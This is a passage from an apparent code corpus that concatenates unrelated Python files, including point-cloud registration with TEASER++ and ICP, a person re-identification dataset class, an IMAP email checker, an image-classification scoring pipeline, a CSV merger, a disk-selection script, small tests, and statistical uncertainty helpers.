    package_root = Path(__file__).resolve().parent.parent
    ner_dir = package_root.joinpath("python_mecab_ner", "data", "ner_data")
    return {"python_mecab_ner": ner_dir}
| StarcoderdataPython |
1884273 | # -*- coding: utf-8 -*-
"""
@author: <NAME>
@email: <EMAIL>
@time: 8/18/21 11:02 AM
"""
import time
import transforms3d as t3d
import copy
from helpers import *
from dataset import Reader
# Voxel edge lengths (same units as the point clouds): the coarse grid feeds
# FPFH/TEASER++ global registration, the finer grid the ICP refinement.
VOXEL_SIZE = 5
VOXEL_SIZE_FINE = 3
# Toggle the Open3D visualisation windows.
VISUALIZE = True
def main():
    """Register every artificial scan against its CAD model.

    Pipeline per sample: FPFH feature matching -> TEASER++ global
    registration -> point-to-point ICP refinement, accumulating
    rotation/translation errors and timings per method.

    Fixes relative to the previous revision:
      * global/local registration times are now recorded, so the final
        summary loop no longer raises IndexError on the empty time lists,
      * the summary prints ``time_global + time_local`` instead of adding
        the global time twice,
      * the correspondence-drawing loop no longer reuses the sample index
        variable ``i``.
    """
    global_registrations = [get_teaser_solver]
    global_registration = get_teaser_solver
    # Per-method accumulators for identifiers, errors and timings.
    statistics = {global_registration: {'method': global_registration,
                                        'model': [],
                                        's#': [],
                                        't#': [],
                                        'r': [],
                                        't': [],
                                        'time_global': [],
                                        'time_local': []} for global_registration in global_registrations}

    output_path = './data/TUW_TUW_data/'
    output_json_path = output_path + 'data.json'

    dl = Reader()
    dl.read(output_json_path)

    for sample_idx in range(len(dl)):
        source = dl[sample_idx]
        A_pcd_raw, B_pcd_raw = source['pc_model'], source['pc_artificial']
        # Ground-truth pose: translation vector plus Euler angles.
        translation_gt, orientation_gt = source['pose'][:3, 3], t3d.euler.mat2euler(source['pose'][:3, :3])
        A_pcd_raw.paint_uniform_color([0.0, 0.0, 1.0])  # show A_pcd in blue
        B_pcd_raw.paint_uniform_color([1.0, 0.0, 0.0])  # show B_pcd in red

        # Fine grid for ICP refinement, coarse grid for feature matching.
        A_pcd_fine = A_pcd_raw.voxel_down_sample(voxel_size=VOXEL_SIZE_FINE)
        B_pcd_fine = B_pcd_raw.voxel_down_sample(voxel_size=VOXEL_SIZE_FINE)
        A_pcd = A_pcd_raw.voxel_down_sample(voxel_size=VOXEL_SIZE)
        B_pcd = B_pcd_raw.voxel_down_sample(voxel_size=VOXEL_SIZE)
        print('registering', source['instance'], '\n sensor', A_pcd, '\n CAD', B_pcd)

        A_xyz = pcd2xyz(A_pcd)  # np array of size 3 by N
        B_xyz = pcd2xyz(B_pcd)  # np array of size 3 by M

        time_0 = time.time()
        # extract FPFH features
        A_feats = extract_fpfh(A_pcd, VOXEL_SIZE)
        B_feats = extract_fpfh(B_pcd, VOXEL_SIZE)

        # establish correspondences by nearest neighbour search in feature space
        corrs_A, corrs_B = find_correspondences(A_feats, B_feats, mutual_filter=True)
        A_corr = A_xyz[:, corrs_A]  # np array of size 3 by num_corrs
        B_corr = B_xyz[:, corrs_B]  # np array of size 3 by num_corrs
        num_corrs = A_corr.shape[1]
        print(f'FPFH generates {num_corrs} putative correspondences.')

        # visualize the point clouds together with feature correspondences
        points = np.concatenate((A_corr.T, B_corr.T), axis=0)
        lines = [[k, k + num_corrs] for k in range(num_corrs)]
        colors = [[0, 1, 0] for _ in lines]  # lines are shown in green
        line_set = o3d.geometry.LineSet(
            points=o3d.utility.Vector3dVector(points),
            lines=o3d.utility.Vector2iVector(lines),
        )
        line_set.colors = o3d.utility.Vector3dVector(colors)
        o3d.visualization.draw_geometries([A_pcd, B_pcd, line_set])

        # robust global registration using TEASER++
        NOISE_BOUND = VOXEL_SIZE
        teaser_solver = get_teaser_solver(NOISE_BOUND)
        teaser_solver.solve(A_corr, B_corr)
        solution = teaser_solver.getSolution()
        R_teaser = solution.rotation
        t_teaser = solution.translation
        T_teaser = Rt2T(R_teaser, t_teaser)
        time_global = time.time() - time_0

        A_pcd_T_teaser = copy.deepcopy(A_pcd).transform(T_teaser)

        # local refinement using ICP on the finer grids
        time_1 = time.time()
        NOISE_BOUND = VOXEL_SIZE * 0.4
        icp_sol = o3d.pipelines.registration.registration_icp(
            A_pcd_fine, B_pcd_fine, NOISE_BOUND, T_teaser,
            o3d.pipelines.registration.TransformationEstimationPointToPoint(),
            o3d.pipelines.registration.ICPConvergenceCriteria(max_iteration=100))
        time_local = time.time() - time_1
        print('time cost', time.time() - time_0)
        T_icp = icp_sol.transformation

        orientation, translation = t3d.euler.mat2euler(T_icp[:3, :3]), T_icp[:3, 3]
        # RMS translation / rotation errors against the ground-truth pose.
        rms_error_t = np.linalg.norm(translation_gt - translation)
        rms_error_r = np.linalg.norm(np.asarray(orientation_gt) - orientation)
        print('registering', source['instance'], '\n sensor', A_pcd, '\n CAD', B_pcd)
        print(' sigma', source['sigma'])
        print(' rotation error', np.rad2deg(rms_error_r))
        print(' translation error', rms_error_t)
        print()

        statistics[global_registration]['model'].append(source['instance'])
        statistics[global_registration]['r'].append(np.rad2deg(rms_error_r))
        statistics[global_registration]['t'].append(rms_error_t)
        statistics[global_registration]['time_global'].append(time_global)
        statistics[global_registration]['time_local'].append(time_local)

        # visualize the registration before and after ICP refinement
        A_pcd_T_icp = copy.deepcopy(A_pcd).transform(T_icp)
        if VISUALIZE: o3d.visualization.draw_geometries([A_pcd_T_teaser, B_pcd])
        if VISUALIZE: o3d.visualization.draw_geometries([A_pcd_T_icp, B_pcd])

    # Summary: total (global + local) registration time per model.
    for reg in statistics.keys():
        for k, model_id in enumerate(statistics[reg]['model']):
            print(' ', reg, model_id, '\n ',
                  statistics[reg]['time_global'][k] + statistics[reg]['time_local'][k])


if __name__ == '__main__':
    main()
| StarcoderdataPython |
6472742 | <reponame>weleen/MGH.pytorch
# encoding: utf-8
"""
@author: liaoxingyu
@contact: <EMAIL>
"""
from torch.utils.data import Dataset
from fastreid.utils.misc import read_image
class CommDataset(Dataset):
    """Dataset wrapper compatible with un/semi-supervised re-id training."""

    def __init__(self, datasets, transform=None, relabel=True):
        # Keep the original dataset objects around; normalise to a list.
        self.datasets = datasets if isinstance(datasets, list) else [datasets]
        self.img_items = list()
        self.transform = transform
        if relabel:
            # Relabel identities and cameras into one contiguous global
            # id space (relabel in the first epoch).
            pid_offset = 0
            cam_offset = 0
            for ds_idx, dataset in enumerate(self.datasets):
                pid_map = {p: i for i, p in enumerate(sorted({d[1] for d in dataset.data}))}
                cam_map = {c: i for i, c in enumerate(sorted({d[2] for d in dataset.data}))}
                for item_idx, (path, pid, camid) in enumerate(dataset.data):
                    self.datasets[ds_idx].data[item_idx] = (
                        path, pid_map[pid] + pid_offset, cam_map[camid] + cam_offset)
                added_pid, added_camid = dataset.parse_data(self.datasets[ds_idx].data)
                pid_offset += added_pid
                cam_offset += added_camid
                self.img_items.extend(self.datasets[ds_idx].data)
        else:
            for dataset in self.datasets:
                self.img_items.extend(dataset.data)

    @property
    def datasets_size(self):
        """Number of items in each wrapped dataset, in order."""
        return [len(ds.data) for ds in self.datasets]

    def __len__(self):
        return len(self.img_items)

    def __getitem__(self, index):
        img_path, pid, camid = self.img_items[index]
        img = read_image(img_path)
        if self.transform is not None:
            img = self.transform(img)
        return {
            "images": img,
            "targets": int(pid),
            "camids": camid,
            "img_paths": img_path,
            "index": int(index),
        }

    @property
    def num_classes(self):
        ids = {item[1] for item in self.img_items}
        # The unlabeled marker -1 does not count as a class.
        return len(ids) - 1 if -1 in ids else len(ids)

    @property
    def num_cameras(self):
        return len({item[2] for item in self.img_items})
| StarcoderdataPython |
8118801 | #!/usr/bin/env python3
# The email checker script: polls an IMAP inbox and reacts to matching mail.
import os
import yaml
import logging
import email
#import bell_slap
from random import randint
from time import sleep
from imapclient import IMAPClient

# Store where we currently are in the filesystem.
__location__ = os.path.realpath(
    os.path.join(os.getcwd(), os.path.dirname(__file__)))

# Attempt to read in the configuration.
with open(os.path.join(__location__, "config.yml"), 'r') as stream:
    try:
        config = yaml.load(stream, Loader=yaml.FullLoader)
    except yaml.YAMLError as exc:
        # NOTE(review): on a parse failure execution continues with `config`
        # unbound, so the IMAP login below raises NameError -- consider
        # exiting here instead.
        print(exc)

# Log into email server.
server = IMAPClient(config['email']['imap_host'])
server.login(config['email']['username'], config['email']['password'])

# See how many messages are in the inbox.
select_info = server.select_folder('INBOX')
logging.info('Messages in INBOX: %d' % select_info[b'EXISTS'])

# See if there are any new messages.
messages = server.search('UNSEEN')
logging.info("Unread messages: %d\n" % len(messages))

# Substrings the sender address and subject must contain.
from_contains = config['conditions']['from_contains']
subject_contains = config['conditions']['subject_contains']

# Process unread messages. When message is fetched, it's marked as 'seen'.
for msgid, message_data in server.fetch(messages, ['RFC822']).items():
    email_message = email.message_from_bytes(message_data[b'RFC822'])
    email_from = email_message.get('From')
    email_subject = email_message.get('Subject')
    # Check if the email from address and subject match our conditions.
    if from_contains in email_from and subject_contains in email_subject:
        print("Found matching email: %s\n" % email_subject)
        #bell_slap.slap_the_bell()
        # Sleep for a few seconds between dings.
        #sleep(randint(1, 5))

server.logout()
| StarcoderdataPython |
8159099 | """
Piąty etap. Po wyodrebnieniu dobrze czasowo detekcji angażujemy do oceny detekcji modele ML (CNN, STD,baseline)
Finalnie oceniamy szanse % na to czy dany obraz jest sygnałem
"""
import os
from ML_function import preprocessData,CNN_classifier,STD_classifier,preprocesDataSTD,preprocesDataBL,BL_classifier,BaseTrigger
import cv2
import json
import glob
import joblib
from joblib import dump, load
#import cpickle
from path_links import main_path,png_detections_path,good_detections_path
# ML models.
# Two-class models -- all CNN variants; each entry maps the model name to the
# wavelet set used for preprocessing ('raw' means no wavelet transform).
model_list_CNN = {'CNN_small_w0':(0,),'CNN_big_w0':(0,),
    'CNN_small_w2':(2,),'CNN_big_w2':(2,),
    'CNN_small_w0_2':(0,2,),'CNN_big_w0_2':(0,2,),
    'CNN_small_w2_10':(2,4,6,8,10,),'CNN_big_w2_10':(2,4,6,8,10,),
    'CNN_small_w20':(20,),'CNN_big_w20':(20,),
    'CNN_small_w2_20':(2,4,6,8,10,12,14,16,18,20,),'CNN_big_w2_20':(2,4,6,8,10,12,14,16,18,20,),
    'CNN_small_raw':('raw',),'CNN_big_raw':('raw',)}
# Baseline models.
model_list_baseline = ['baseline','baseline_knn','baseline_rf']
# Four-class models -- known compatibility and machine issues.
model_list_STD= ['etc','bagsvc','gbc','knn','mlp','nsv','ovo_mlp','ovo_svm','ovr_mlp','rf','svm','vot']
def read_detections():
    """Walk the PNG detection archive (year/month/day), score each day's
    images with the ML model zoo, and write the ``*_final.json`` and
    ``*_update.json`` result files next to the good detections.
    """
    # NOTE(review): these globals are written here and read elsewhere;
    # `falki` is only assigned inside ML_anallyze -- confirm it is intended
    # to be module-global.
    global list_images_name, images, falki
    year_list = ["2021"]
    # Loop over year/month/day -- process detections saved by our old filter
    # for the given day.
    for year in year_list:
        ypath = png_detections_path + year + "/"
        months = [f for f in os.listdir(ypath) if os.path.isdir(os.path.join(ypath, f))]
        for month in months:
            mpath = ypath + str(month) + "/"
            days = [f for f in os.listdir(mpath) if os.path.isdir(os.path.join(mpath, f))]
            for day in days:
                print("***************")
                print(year, month, day)
                print("***************")
                images = []
                list_images_name = []
                location = year + "/" + month + "/" + day
                detect_dict,json_dict,file_name = read_json_detections(location)
                for img in glob.glob(png_detections_path + location + "/*.png"):
                    n = cv2.imread(img)
                    #n = cv2.resize(n, (60,60), interpolation = cv2.INTER_AREA)
                    # Crop a fixed 60x60 window, skipping a 2-pixel border.
                    size_xy=60
                    n = n[2:2 + size_xy, 2:2 + size_xy]
                    #cv2.imshow("cropped", crop_img)
                    #print(n.shape)
                    # Detection id = file name without directory and extension.
                    img = img.split(location + '/')
                    img = img[1].replace(".png","")
                    list_images_name.append(img)
                    images.append(n)
                detect_dict_final = ML_anallyze(images,list_images_name,detect_dict)
                json_dict_update = update_detections(json_dict,detect_dict_final)
                file_names = file_name.replace(".json","")
                with open(good_detections_path+location+"/"+ file_names+"_final.json", 'w') as json_file:
                    dictionary = {"detections":[detect_dict_final]}
                    json.dump(dictionary, json_file, indent=4)
                with open(good_detections_path+location+"/"+ file_names+"_update.json", 'w') as json_file:
                    dictionary = json_dict_update
                    json.dump(dictionary, json_file, indent=4)
def read_json_detections(location):
    """Load the day's raw detection JSON files for ``location`` (yyyy/mm/dd).

    Files produced by earlier runs of this pipeline ("*_final.json",
    "*_update.json") are skipped.  Each detection's brightness verdict is
    turned into the "anti-artefact" vote ("0,signal" or "1,artefact").

    Returns:
        (dict_detect, json_dict, file_name) where ``file_name`` is the last
        raw JSON file processed.

    Raises:
        FileNotFoundError: if the directory holds no raw detection JSON.
            (Previously this surfaced as an UnboundLocalError on return.)
    """
    pathes = good_detections_path + location + "/"
    files_day = [f for f in os.listdir(pathes) if os.path.isfile(os.path.join(pathes, f))]
    dict_detect = {}
    json_dict = {"detections": []}
    file_name = None
    for entry in files_day:
        if ".json" in str(entry) and "final.json" not in str(entry) and "update.json" not in str(entry):
            file_name = entry
            current_file = pathes + entry
            with open(current_file) as json_file:
                json_load = json.load(json_file)
            for detection in json_load['detections']:
                det_id = str(detection["id"])
                if str(detection["good_bright"]) == "True":
                    ocena = "0,signal"
                else:
                    ocena = "1,artefact"
                dict_detect[det_id] = {"anti-artefact": ocena}
                json_dict["detections"].append(detection)
    if file_name is None:
        raise FileNotFoundError("no raw detection JSON found in " + pathes)
    return dict_detect, json_dict, file_name
def update_detections(json_dict, detect_dict_final):
    """Copy each detection's ML score from ``detect_dict_final`` into
    the matching entry of ``json_dict`` (matched on the string id).

    Returns the mutated ``json_dict``.
    """
    for detection in json_dict["detections"]:
        det_id = str(detection["id"])
        if det_id in detect_dict_final:
            detection["ML_score"] = detect_dict_final[det_id]["dobry_kandydat"]
    return json_dict
def ML_anallyze(images, list_images_name, detect_dict):
    """Score every detection image with the CNN / STD / baseline model zoo.

    Each classifier writes its class vote into ``detect_dict[id]``; the votes
    are then normalised to "<class>,signal" / "<class>,artefact" strings and
    aggregated into the percentage "dobry_kandydat" score (the share of
    classifiers that voted signal).

    Args:
        images: list of cropped detection images (numpy arrays).
        list_images_name: detection ids, parallel to ``images``.
        detect_dict: per-detection dict, pre-filled with the "anti-artefact"
            verdict of the old brightness filter.

    Returns:
        ``detect_dict`` enriched with per-classifier votes and the final score.
    """
    # --- two-class CNN models ---
    for model in model_list_CNN:
        falki = model_list_CNN[model]
        feature_array = preprocessData(data=(images), wavelets=falki)
        if feature_array.size > 1:
            try:
                print(model)
                tmp = CNN_classifier(model, list_images_name, feature_array)
                for i in range(len(tmp)):
                    detect_dict[tmp.loc[i]['Hit ID']][tmp.loc[i]['Classifier']] = int(tmp.loc[i]['Class'])
            except Exception as e:
                print(e)
                print("cos nie tak")
        else:
            print("feature_array nie jest prawidłowy")
    print("&&&&&&&& STD MODELS &&&&&&&")
    feature_array2 = preprocesDataSTD(images)  # features for the STD models
    for model in model_list_STD:
        print(model)
        try:
            tmp = STD_classifier(model, list_images_name, feature_array2)
            for i in range(len(tmp)):
                detect_dict[tmp.loc[i]['Hit ID']][tmp.loc[i]['Classifier']] = int(tmp.loc[i]['Class'])
        except Exception as e:
            print("error")
            print(e)
    print("&&&&&&&& BASELINE MODELS &&&&&&&")
    feature_arrayBL = preprocesDataBL(images)  # features for the baseline models
    for model in model_list_baseline:
        print(model)
        try:
            # BUG FIX: the baseline classifiers previously received the STD
            # features (feature_array2) while feature_arrayBL went unused;
            # feed them their own features.
            tmp = BL_classifier(model, list_images_name, feature_arrayBL)
            for i in range(len(tmp)):
                detect_dict[tmp.loc[i]['Hit ID']][tmp.loc[i]['Classifier']] = int(tmp.loc[i]['Class'])
        except Exception as e:
            print(e)
    # --- aggregate the votes: class 0 == signal, higher classes lean artefact ---
    anty, ML = 0, 0
    for element in detect_dict:
        ocena = []
        for klasyfikator in detect_dict[element]:
            value_class = -1  # not set
            if klasyfikator in model_list_CNN or klasyfikator in model_list_baseline:
                if detect_dict[element][klasyfikator] == 0:
                    value_class = str(detect_dict[element][klasyfikator]) + ",signal"
                else:
                    value_class = str(detect_dict[element][klasyfikator]) + ",artefact"
            if klasyfikator in model_list_STD:
                # Four-class STD models: classes 0-2 count as signal.
                if detect_dict[element][klasyfikator] < 3:
                    value_class = str(detect_dict[element][klasyfikator]) + ",signal"
                else:
                    value_class = str(detect_dict[element][klasyfikator]) + ",artefact"
            if klasyfikator == "anti-artefact":
                value_class = detect_dict[element][klasyfikator]
            detect_dict[element][klasyfikator] = value_class
            if value_class != -1:
                ocena.append(value_class)
        score = ((ocena.count("0,signal") + ocena.count("1,signal") + ocena.count("2,signal")) / len(ocena)) * 100
        detect_dict[element]["dobry_kandydat"] = round(score, 2)
        # The closer the class to 0 the more likely a signal; a score above
        # 80 means more than 80% of the classifiers voted signal.
        if score > 80:
            ML += 1
            # BUG FIX: "anti-artefact" holds the string "0,signal"/"1,artefact",
            # so the old comparison `== 0` was never true and `anty` stayed 0.
            if detect_dict[element]["anti-artefact"] == "0,signal":
                anty += 1
    print(anty, ML)
    return (detect_dict)
def main():
    """Entry point: walk the detection archive and score every day's images."""
    read_detections()


if __name__ == '__main__':
    main()
207590 | import csv
import os
import glob
import argparse
import numpy as np
def merge_csv_files(src_dir, dst_dir):
    '''
    Merge all per-frame "*_md.csv" files in ``src_dir`` into a single
    "GR_<yyyymmdd>_metadata.csv" written to ``dst_dir``.
    '''
    # Collect all the metadata files in the given directory.
    csv_list = glob.glob(os.path.join(src_dir, '*_md.csv'))

    def _frame_number(path):
        # Frame number is the 4th underscore-separated field of the file
        # name (e.g. "2019_07_04_<frame>_md.csv").  Fall back to -1 so
        # oddly named files sort first instead of crashing.
        try:
            return int(os.path.basename(path).split('_')[3])
        except (IndexError, ValueError):
            return -1

    # BUG FIX: sort numerically by frame; the old lexicographic sort put
    # frame 10 before frame 2.
    csv_list.sort(key=_frame_number)

    # extract the flight name (i.e. date) from one of the csv files
    fname = os.path.basename(csv_list[0])
    flight_id = fname.rsplit('_', 2)[0].split('/')[-1]
    yyyy, mm, dd = flight_id.split('_')

    # Read each file and add it to the aggregate list.
    aggregate_data = [read_md_file(file) for file in csv_list]

    dst_name = 'GR_{}{}{}_metadata.csv'.format(yyyy, mm, dd)
    dst_file = os.path.join(dst_dir, dst_name)

    # Write the aggregated data to a single output file.
    write_merged_md(dst_file, aggregate_data)
def read_md_file(md_file):
    '''
    Read a single per-frame metadata CSV and return the relevant values as
    [frame, qa, snow, gray, pond, ocean, shadow].  Missing columns and empty
    files leave the corresponding defaults (zeros) in place.
    '''
    qa = 0
    snow, gray, pond, ocean, shadow = 0, 0, 0, 0, 0
    # Frame number is the 4th underscore-separated field of the file name.
    frame = int(os.path.basename(md_file).split('_')[3])
    with open(md_file, 'r') as md:
        reader = csv.reader(md)
        try:
            next(reader)  # drop the header row
            for row in reader:
                qa = float(row[0])
                snow = float(row[1])
                gray = float(row[2])
                pond = float(row[3])
                ocean = float(row[4])
                try:
                    shadow = float(row[5])
                except IndexError:
                    # Older files have no shadow column.
                    shadow = 0
        except Exception as e:  # tolerate empty or malformed files
            print('Caught exception: ' + str(e))
            print('File: ' + md_file)
    return [frame, qa, snow, gray, pond, ocean, shadow]
def write_merged_md(dst_file, aggregate_data):
    """Write the aggregated per-frame rows, preceded by a header, to ``dst_file``."""
    print("Writing to {}...".format(dst_file))
    header = ["Frame", "Quality Score", "White Ice",
              "Gray Ice", "Melt Ponds", "Open Water", "Shadow"]
    with open(dst_file, 'w') as md:
        writer = csv.writer(md)
        writer.writerow(header)
        writer.writerows(aggregate_data)
def main():
    """CLI entry point: parse arguments and merge the metadata files."""
    parser = argparse.ArgumentParser()
    parser.add_argument("src_dir",
                        help="Source directory containing *_md.csv files.")
    parser.add_argument("--dst_dir", default=None,
                        help="folder to place the merged data file")
    args = parser.parse_args()
    src_dir = args.src_dir
    # Default the destination to the parent of the source directory.
    dst_dir = args.dst_dir if args.dst_dir is not None else os.path.split(src_dir)[0]
    merge_csv_files(src_dir, dst_dir)


if __name__ == '__main__':
    main()
| StarcoderdataPython |
9647549 | import subprocess
import os
class DiskInfo(object):
    """Attributes of one block device, collected from udev.

    Raises from the constructor when the device is not a plain disk, is a
    device-mapper node, or has no identifiable driver.
    """

    def __init__(self, devname):
        self.name = devname
        self.wwn = None
        self.path = None
        self.model = ''
        self.size = 0
        self.driver = None
        self.mdcontainer = ''
        devnode = '/dev/{0}'.format(devname)
        # Query udev properties; reject anything that is not a plain disk.
        props = subprocess.check_output(
            ['udevadm', 'info', '--query=property', devnode])
        if not isinstance(props, str):
            props = props.decode('utf8')
        for line in props.split('\n'):
            if '=' not in line:
                continue
            key, value = line.split('=', 1)
            if key == 'DEVTYPE' and value != 'disk':
                raise Exception('Not a disk')
            elif key == 'DM_NAME':
                raise Exception('Device Mapper')
            elif key == 'ID_MODEL':
                self.model = value
            elif key == 'DEVPATH':
                self.path = value
            elif key == 'ID_WWN':
                self.wwn = value
            elif key == 'MD_CONTAINER':
                self.mdcontainer = value
        # Walk the sysfs attribute chain for the size and the owning driver
        # (skipping the generic "sd" driver and empty entries).
        attrs = subprocess.check_output(['udevadm', 'info', '-a', devnode])
        if not isinstance(attrs, str):
            attrs = attrs.decode('utf8')
        for line in attrs.split('\n'):
            if '==' not in line:
                continue
            key, value = line.split('==', 1)
            key = key.strip()
            if key == 'ATTRS{size}':
                self.size = value.replace('"', '')
            elif (key == 'DRIVERS' and not self.driver
                    and value not in ('"sd"', '""')):
                self.driver = value.replace('"', '')
        if not self.driver and 'imsm' not in self.mdcontainer:
            raise Exception("No driver detected")

    @property
    def priority(self):
        """Install-target ranking -- lower is preferred."""
        if self.model.lower() in ('thinksystem_m.2_vd', 'thinksystem m.2'):
            return 0
        if 'imsm' in self.mdcontainer:
            return 1
        if self.driver == 'ahci':
            return 2
        if self.driver.startswith('megaraid'):
            return 3
        if self.driver.startswith('mpt'):
            return 4
        return 99

    def __repr__(self):
        return repr({
            'name': self.name,
            'path': self.path,
            'wwn': self.wwn,
            'driver': self.driver,
            'size': self.size,
            'model': self.model,
        })
def main():
    """Probe every block device and record the best install target.

    Writes the chosen device name to /tmp/installdisk (if any device
    qualifies); devices that fail probing are reported and skipped.
    """
    candidates = []
    for dev in sorted(os.listdir('/sys/class/block')):
        try:
            candidates.append(DiskInfo(dev))
        except Exception as e:
            print("Skipping {0}: {1}".format(dev, str(e)))
    ordered = [c.name for c in sorted(candidates, key=lambda c: c.priority)]
    if ordered:
        open('/tmp/installdisk', 'w').write(ordered[0])


if __name__ == '__main__':
    main()
| StarcoderdataPython |
6706616 | <reponame>disktnk/chainer-compiler<filename>elichika/tests/node/ndarray/Ceil.py
# coding: utf-8
import chainer
import numpy as np
import testtools
class A(chainer.Chain):
    """Minimal chain whose forward pass applies elementwise ceil."""

    def __init__(self):
        super(A, self).__init__()

    def forward(self, x):
        # Round every element up to the nearest integer.
        return np.ceil(x)
# ======================================
def main():
    """Export the Ceil model together with a random input as a test case."""
    model = A()
    # Inputs spread over [-50, 50) so both signs are exercised.
    x = (np.random.rand(6, 4).astype(np.float32) - 0.5) * 100.0
    testtools.generate_testcase(model, [x])


if __name__ == '__main__':
    main()
5166910 | <filename>tests/test_visualisation.py<gh_stars>0
"""The script to test visualisation"""
import cryptools.visualisation as vs
import pytest
def test_candle_1():
    # candle() is expected to reject a nested list whose inner rows are not
    # valid candle records -- presumably incomplete OHLC data; confirm
    # against cryptools.visualisation.candle's contract.
    with pytest.raises(TypeError):
        vs.candle([[0, 1, 1, 1]])
def test_candle_2():
    # A flat list of scalars is likewise expected to raise TypeError.
    with pytest.raises(TypeError):
        vs.candle([0, 1, 1, 1])
| StarcoderdataPython |
75718 | <reponame>ihmeuw/cascade-at
import numpy as np
from scipy import stats
from cascade_at.dismod.constants import DensityEnum
from cascade_at.core.log import get_loggers
LOG = get_loggers(__name__)
def meas_bounds_to_stdev(df):
    """
    Convert measurement bounds, treated as 95% confidence intervals, into
    standard errors.

    Rows gain a Gaussian density, a constant weight, and a ``standard_error``
    column derived from ``meas_lower``/``meas_upper``.  Zero standard errors
    are replaced with 1e-9; ``meas_value`` is renamed to ``mean`` and the
    bound columns are dropped.
    """
    LOG.debug("Assigning standard error from measured upper and lower.")
    out_of_order = (df.meas_lower > df.meas_value) | (df.meas_value > df.meas_upper)
    bad_rows = np.sum(out_of_order)
    if bad_rows > 0:
        raise ValueError(f"Found data where meas_lower > meas_value or meas_upper < meas_value on {bad_rows} rows")
    df["standard_error"] = bounds_to_stdev(df.meas_lower, df.meas_upper).replace({0: 1e-9})
    df = df.rename(columns={"meas_value": "mean"})
    df["density"] = DensityEnum.gaussian
    df["weight"] = "constant"
    return df.drop(["meas_lower", "meas_upper"], axis=1)
def wilson_interval(prop, ess):
    """
    Half-width term of the Wilson score interval for a proportion.

    Args:
        prop: observed proportion.
        ess: effective sample size.

    Returns:
        The Wilson interval half-width.
    """
    z = stats.norm.ppf(q=0.975)
    variance_term = prop * (1 - prop) / ess
    correction_term = z ** 2 / (4 * ess ** 2)
    return np.sqrt(variance_term + correction_term)
def ess_to_stdev(mean, ess, proportion=False):
    """
    Convert means and effective sample sizes into standard errors.

    Counts (``mean * ess``) are assumed Poisson distributed; for counts
    below 5 the result linearly interpolates between the binomial
    zero-count limit and the Poisson value at a count of 5.  With
    ``proportion=True`` the Wilson score interval half-width is returned
    instead.

    Args:
        mean: pd.Series of means (rates or proportions).
        ess: pd.Series of effective sample sizes.
        proportion: (bool) whether the measure is a proportion.

    Returns:
        Standard errors, element-wise.
    """
    if proportion:
        # Proportions use the Wilson score interval.
        return wilson_interval(prop=mean, ess=ess)
    count = mean * ess
    # Binomial zero-count limit and the Poisson value at count == 5.
    std_zero = 1.0 / ess
    std_five = np.sqrt(5.0 / ess ** 2)
    std = np.sqrt(mean / ess)
    small = count < 5
    # Linear blend between the two limits for small counts.
    std[small] = ((5.0 - count[small]) * std_zero[small]
                  + count[small] * std_five[small]) / 5.0
    return std
def bounds_to_stdev(lower, upper):
    r"""Convert the bounds of a 95% confidence interval into a standard
    deviation.

    .. math::
        \mbox{stderr} = \frac{\mbox{upper} - \mbox{lower}}{2 \times 1.96}

    Args:
        lower (pd.Series): The lower bound of the CI.
        upper (pd.Series): The upper bound of the CI.

    Returns:
        pd.Series: The standard deviation for that CI.
    """
    z = stats.norm.ppf(q=0.975)
    return (upper - lower) / (2 * z)
def check_crosswalk_version_uncertainty_columns(df):
    """
    Validate the uncertainty columns of a crosswalk version data frame.

    Returns four boolean pd.Series flagging rows that carry a usable
    standard error, uncertainty interval, effective sample size, and
    sample size, respectively.

    Raises:
        ValueError: if any row has no usable uncertainty at all.
    """
    has_se = df['standard_error'].notnull() & (df['standard_error'] > 0)
    LOG.info(f"{sum(has_se)} rows have standard error.")
    has_ui = df['lower'].notnull() & df['upper'].notnull()
    LOG.info(f"{sum(has_ui)} rows have uncertainty.")
    has_ess = df['effective_sample_size'].notnull() & (df['effective_sample_size'] > 0)
    LOG.info(f"{sum(has_ess)} rows have effective sample size.")
    has_ss = df['sample_size'].notnull() & (df['sample_size'] > 0)
    LOG.info(f"{sum(has_ss)} rows have sample size.")
    if sum(has_se | has_ui | has_ess | has_ss) < len(df):
        raise ValueError("Some rows have no valid uncertainty.")
    return has_se, has_ui, has_ess, has_ss
def stdev_from_crosswalk_version(crosswalk_version):
    """
    Takes a crosswalk version data frame and figures out the standard deviation
    from what is included in the bundle.

    There are other functions that will still use the bounds_to_stdev
    function rather than this because they're not dealing with
    crosswalk versions. This function should only be used for crosswalk versions.

    We prefer standard deviation (has_se), then uncertainty intervals (has_ui),
    then effective sample size (has_es), then sample size (has_ss).

    Args:
        crosswalk_version (pd.DataFrame)

    Returns:
        pd.Series: the repaired standard errors, one per input row.
    """
    df = crosswalk_version.copy()
    standard_error = df['standard_error'].copy()

    has_se, has_ui, has_ess, has_ss = check_crosswalk_version_uncertainty_columns(df)
    # Pecking-order masks: rows missing an item fall back to the next source.
    replace_ess_with_ss = ~has_ess & has_ss
    LOG.info(f"{sum(replace_ess_with_ss)} rows will have their effective sample size filled by sample size.")
    replace_se_with_ui = ~has_se & has_ui
    LOG.info(f"{sum(replace_se_with_ui)} rows will have their standard error filled by uncertainty intervals.")
    replace_se_with_ess = ~has_se & ~has_ui
    LOG.info(f"{sum(replace_se_with_ess)} rows will have their standard error filled by effective sample size.")

    # Replace effective sample size with sample size
    df.loc[replace_ess_with_ss, 'effective_sample_size'] = df.loc[replace_ess_with_ss, 'sample_size']

    # Calculate the candidate standard deviations both ways up front.
    stdev_from_bounds = bounds_to_stdev(lower=df['lower'], upper=df['upper'])
    stdev_from_es = ess_to_stdev(mean=df['mean'], ess=df['effective_sample_size'])

    # Check to see if the UI was bad to begin with, then go to ESS
    bad_ui = stdev_from_bounds <= 0
    replace_se_with_ess = replace_se_with_ess | (replace_se_with_ui & bad_ui)

    # Use boolean arrays representing the pecking order to replace standard
    # error.  Order matters: ESS overwrites UI for rows whose UI was bad.
    standard_error[replace_se_with_ui] = stdev_from_bounds[replace_se_with_ui]
    standard_error[replace_se_with_ess] = stdev_from_es[replace_se_with_ess]

    # Do a final check on standard error; unrepairable rows are only logged,
    # not raised.
    if ((standard_error <= 0) | standard_error.isnull()).any():
        LOG.error("There are unrepairable negative or null values for standard error in the bundle.")
    return standard_error
| StarcoderdataPython |
1914739 | #! /usr/bin/env python3
import json
from flask import Flask, jsonify
from flask_restful import Resource, Api, reqparse, abort
from db import TopicList, Topic
from playhouse.shortcuts import model_to_dict
import logging
# Echo peewee's generated SQL to stderr while developing.
logger = logging.getLogger("peewee")
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.DEBUG)

app = Flask(__name__)
api = Api(app)
class HelloWorld(Resource):
